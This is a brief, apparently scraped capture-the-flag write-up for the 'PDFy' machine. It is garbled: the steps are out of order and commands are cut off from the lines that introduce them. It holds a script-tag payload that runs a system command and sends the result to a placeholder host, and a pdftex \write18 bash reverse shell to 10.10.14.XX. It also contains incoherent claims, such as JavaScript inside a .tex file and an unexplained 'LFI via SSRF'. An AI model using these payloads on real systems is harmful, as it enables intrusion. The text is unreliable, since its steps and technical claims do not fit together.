Pdfy Htb Writeup Upd May 2026
Create a malicious .tex file:
<script> document.write('<img src="http://your-ip:4444/?c=' + require('child_process').execSync('id') + '">'); </script>

However, for PDFY specifically, the working exploit often involves pdftex and \write18. After testing command injection, send a reverse shell payload.
ls -la /home/

You might find a user (e.g., robert or pdfuser). Check their home directory:
Example using bash -i :
Check sudo rights:
nc -lvnp 4444

Once connected, you’re www-data. Now, look for the flag.

Step 8: Capturing the User Proof Data (UPD)

The UPD for PDFY is typically located in the home directory of a low-privilege user. Let's enumerate.
\immediate\write18/bin/bash -c "bash -i >& /dev/tcp/10.10.14.XX/5555 0>&1"

After executing the pdftex exploit:
The User Proof Data flag is often not in /etc/passwd, but this confirms LFI via SSRF.

Step 4: Reading the Source Code

Using the SSRF, read the main PHP file that handles PDF generation.



